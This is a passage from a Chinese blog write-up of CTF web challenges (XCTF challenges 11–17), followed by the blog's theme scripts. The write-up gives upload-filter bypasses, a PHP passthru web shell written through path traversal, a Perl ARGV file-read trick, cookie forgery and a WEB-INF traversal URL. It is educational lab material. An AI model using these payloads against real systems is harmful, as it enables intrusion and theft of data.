<p>退出登陆，然后去找回密码的功能模块，根据得到个人信息修改密码</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image090.jpg" alt="img"></p>
<pre><code>修改完密码后进行登陆，点击Manager模块，报IP错误，修改ip为X-Forwarded-For: 127.0.0.1，成功，后查看源代码有传参可以传，”?module=filemanage&amp;do=???”尝试之后？？？为upload
</code></pre><p><img src="/2020/04/05/攻防世界web 部分wp/clip_image092.jpg" alt="img"><img src="file:///C:/Users/jaie/AppData/Local/Temp/msohtmlclip1/01/clip_image094.jpg" alt="img"></p>
<p>上传一个php文件，为了绕过进行里php语言的特殊写法<script language="php"></script>如图，进行绕过处理mime改为image/png,文件名为:php4,上传成功，回宣得到flag值</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image096.jpg" alt="img"></p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image098.jpg" alt="img"></p>
<h2 id="12-wtf-sh-150"><a href="#12-wtf-sh-150" class="headerlink" title="12.wtf.sh-150"></a>12.wtf.sh-150</h2><p>进入后发现是一个论坛网站，有登录注册，帖子，任意点击一个帖子，发现url中有可测试的尝试，尝试一波发现有文件包含漏洞，可以爆出源代码，将源代码格式化一下方便阅读</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image100.jpg" alt="img"></p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image102.jpg" alt="img"></p>
<p>从源代码中可以看到存在user目录，且admin登录可以得到flag，遍历进入users目录后好像可以看到类似admin账号cookie</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image104.jpg" alt="img"></p>
<p>注册一个账户，登录后修改相关的cookie值，刷新后登录为admin账户</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image106.jpg" alt="img"></p>
<p>点击profile标签，在网页末尾可以看到flag值，但这只是flag值前一部分</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image108.jpg" alt="img"></p>
<h2 id="13-i-got-id-200"><a href="#13-i-got-id-200" class="headerlink" title="13.i-got-id-200"></a>13.i-got-id-200</h2><p>初始界面是这样的，点进files，是一个文件上传界面，url中页面文件格式是.pl,可知是perl语言编写的，通过多次上传图片文件，文本格式文件，发现都会输出成文本，</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image110.jpg" alt="img"></p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image112.jpg" alt="img"></p>
<p>由此猜测是这样的编程格式</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image114.jpg" alt="img"></p>
<p>param()函数会返回一个列表的文件但是只有第一个文件会被放入到下面的file变量中。而对于下面的读文件逻辑来说，如果我们传入一个ARGV的文件，那么Perl会将传入的参数作为文件名读出来。这样，我们的利用方法就出现了：在正常的上传文件前面加上一个文件上传项ARGV，然后在URL中传入文件路径参数，这样就可以读取任意文件了。</p>
<p>ARGV是PERL默认用来接收参数的数组,不管脚本里有没有把它写出来,它始终是存在的。</p>
<p>所以在上传文件进行拦包改包，添加avgv参数，通过测试发现成功</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image116.jpg" alt="img"></p>
<p>猜测目录下可能存在flag文件成功读取flag值</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image118.jpg" alt="img"></p>
<h2 id="14-ics-07"><a href="#14-ics-07" class="headerlink" title="14.ics-07"></a>14.ics-07</h2><p>打开进去指定页面url个page参数，并且下方可以查看源代码</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image120.jpg" alt="img"></p>
<p>源代码中可以看出要绕过id</p>
<p>绕过要注意的三个点为：</p>
<p>（1）floatval（$ _ GET [id]）！==’1’ //浮点不为1</p>
<p>（2）substr（$ _ GET [id]，-1）===’9‘ //id最后一位为9</p>
<p>（3）Mysql查询结果限制，id不能过大，</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image122.jpg" alt="img"></p>
<p>构建exp ?page=&amp;id=1/9&amp;submit=提交查询#，可得到admin，</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image124.jpg" alt="img"></p>
<p>再根据源代码审计，post方式提交一个文件，真实的上传路径是uploaded，</p>
<p>进行文件过滤，要注意的三个点为：</p>
<p>（1）$filename = “backup/“.$file; //目录为假目录，传入file时，加上一个../</p>
<p>（2）’/.+.ph(p[3457]?|t|tml)$/i’ //正则过滤文件只匹配最后一个点的后缀，可以写入两次.php</p>
<p>（3）真实上传目录为upload</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image126.jpg" alt="img"></p>
<p>构建exp为file=../123.php/1.php/..&amp;con=&lt;?php passthru($_GET[bash]);?&gt;,用post方式进行传递</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image128.jpg" alt="img"></p>
<p>访问:<a href="http://111.198.29.45:55105/uploaded/123.php?bash=cat ../flag.php" target="_blank" rel="noopener">http://111.198.29.45:55105/uploaded/123.php?bash=cat%20../flag.php</a></p>
<p>查看源代码得到flag值</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image130.jpg" alt="img"></p>
<h2 id="15-Web2"><a href="#15-Web2" class="headerlink" title="15.Web2"></a>15.Web2</h2><p>点进去后发现是解密的题</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image132.jpg" alt="img"></p>
<p>审计后我们先解密$_变量</p>
<p>a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws</p>
<p>str_rot13 — 对字符串执行 ROT13 转换 =》rot13解密</p>
<p>n1mYotDfPRFRVdEYjhDNlZjYld2Y5IjOkdTN3EDNlhzM0gzZiFTZ2MjO4gjf</p>
<p>strrev — 反转字符串 =》fjg4OjM2ZTFiZzg0MzhlNDE3NTdkOjI5Y2dlYjZlNDhjYEdVRFRPfDtoYm1n</p>
<p>base64解码=》~88:36e1bg8438e41757d:29cgeb6e48c`GUDTO|;hbmg</p>
<p>由此构建php文件</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image134.jpg" alt="img"></p>
<p>这里需要翻转一下$_变量</p>
<p>解析php文件得到flag值</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image136.jpg" alt="img"></p>
<h2 id="16-Website"><a href="#16-Website" class="headerlink" title="16.Website"></a>16.Website</h2><p>是一个是登录页面，首先扫一下目录，扫出一个test.php页面，base64的值解密出来是乱码，</p>
<p>返回注册一个用户，并登录，</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image138.jpg" alt="img"></p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image140.jpg" alt="img"></p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image142.jpg" alt="img"></p>
<p>登录后，好像普通用户无法等到flag值，查看cookie值并尝试修改cookie值为刚才的base64,刷新后发现是admin账户了，并且等到flag值</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image144.jpg" alt="img"></p>
<h2 id="17-Zhuanxv——javaweb-HQL注入"><a href="#17-Zhuanxv——javaweb-HQL注入" class="headerlink" title="17.Zhuanxv——javaweb HQL注入"></a>17.Zhuanxv——javaweb HQL注入</h2><p><img src="/2020/04/05/攻防世界web 部分wp/clip_image146.jpg" alt="img"></p>
<p>整一个静态界面，源码也找不出什么，目录扫描烧到list目录进入后到登录界面</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image148.jpg" alt="img"></p>
<p>在github找到Zhuanxv application的项目，<a href="https://github.com/Lazyboxx/zhuanxvapplication" target="_blank" rel="noopener">https://github.com/Lazyboxx/zhuanxvapplication</a></p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image150.jpg" alt="img"></p>
<p>用初始账号密码登录失败，爆破一下密码，密码是：6yhn7ujm</p>
<p>登录进去发现没有利用的点，查看登录界面的源代码，进行审计发现有一个可疑的参数，进行文件包含下载</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image152.jpg" alt="img"></p>
<p>在从github项目committed的历史记录中可以知道使用maven框架搭建的web</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image154.jpg" alt="img"></p>
<p>因为使用javaweb的maven框架，有通用的目录结构</p>
<p><img src="/2020/04/05/攻防世界web 部分wp/clip_image156.jpg" alt="img"></p>
<p><a href="http://111.198.29.45:37888/loadimage?fileName=../../WEB-INF/web.xml" target="_blank" rel="noopener">http://111.198.29.45:37888/loadimage?fileName=../../WEB-INF/web.xml</a></p>
<p>下载web.xml</p>
<p>WEB-INF是Java的WEB应用的安全目录。所谓安全就是客户端无法访问，只有服务端可以访问的目录。如果想在页面中直接访问其中的文件，必须通过web.xml文件对要访问的文件进行相应映射才能访问。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf/" rel="tag"><i class="fa fa-tag"></i> ctf</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/03/23/攻防世界部分misc高手区题/" rel="next" title="攻防世界misc高手区 Wiretup">
                <i class="fa fa-chevron-left"></i> 攻防世界misc高手区 Wiretup
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/07/05/树莓派安装kali2020教程和坑点/" rel="prev" title="树莓派安装kali2020检测和坑点">
                树莓派安装kali2020检测和坑点 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="lv-container" data-id="city" data-uid="MTAyMC80MzA1OC8xOTYwNA=="></div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="https://jaie-1256725437.cos.ap-guangzhou.myqcloud.com/pic/20190424201847.png" alt="Jaie">
            
              <p class="site-author-name" itemprop="name">Jaie</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">33</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/Tags/index.html">
                  <span class="site-state-item-count">14</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/rss2.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/Jaie0801" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="jaie0801@outlook.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://www.zhihu.com/people/jay-73-89" target="_blank" title="知乎">
                      
                        <i class="fa fa-fw fa-gratipay"></i>知乎</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://weibo.com/2130700007" target="_blank" title="微博">
                      
                        <i class="fa fa-fw fa-weibo"></i>微博</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#攻防世界web高手区"><span class="nav-number">1.</span> <span class="nav-text">攻防世界web高手区</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-ics-06"><span class="nav-number">1.1.</span> <span class="nav-text">1.ics-06</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-NewsCenter-——sql注入"><span class="nav-number">1.2.</span> <span class="nav-text">2. NewsCenter ——sql注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-Mfw-——-git路径信息泄漏"><span class="nav-number">1.3.</span> <span class="nav-text">3. Mfw ——.git路径信息泄漏</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-NaNNaNNaNNaN-Batman"><span class="nav-number">1.4.</span> <span class="nav-text">4. NaNNaNNaNNaN-Batman</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5-Upload-—————文件名注入"><span class="nav-number">1.5.</span> <span class="nav-text">5. Upload   —————文件名注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#6-PHP2"><span class="nav-number">1.6.</span> <span class="nav-text">6. PHP2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#7-unserialize3-——php反序列化"><span class="nav-number">1.7.</span> <span class="nav-text">7. unserialize3 ——php反序列化</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#8-Cat-——命令注入"><span class="nav-number">1.8.</span> <span class="nav-text">8. Cat  ——命令注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#9-ics-04——sql-post注入"><span class="nav-number">1.9.</span> <span class="nav-text">9. ics-04——sql post注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#10-Isc-05"><span class="nav-number">1.10.</span> <span class="nav-text">10.Isc-05</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#11-BUG"><span class="nav-number">1.11.</span> <span class="nav-text">11.BUG</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#12-wtf-sh-150"><span class="nav-number">1.12.</span> <span class="nav-text">12.wtf.sh-150</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#13-i-got-id-200"><span class="nav-number">1.13.</span> <span class="nav-text">13.i-got-id-200</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#14-ics-07"><span class="nav-number">1.14.</span> <span class="nav-text">14.ics-07</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#15-Web2"><span class="nav-number">1.15.</span> <span class="nav-text">15.Web2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#16-Website"><span class="nav-number">1.16.</span> <span class="nav-text">16.Website</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#17-Zhuanxv——javaweb-HQL注入"><span class="nav-number">1.17.</span> <span class="nav-text">17.Zhuanxv——javaweb HQL注入</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Jaie</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">18.2k</span>
  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>



  
  

  

  

  

</body>
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
</html>
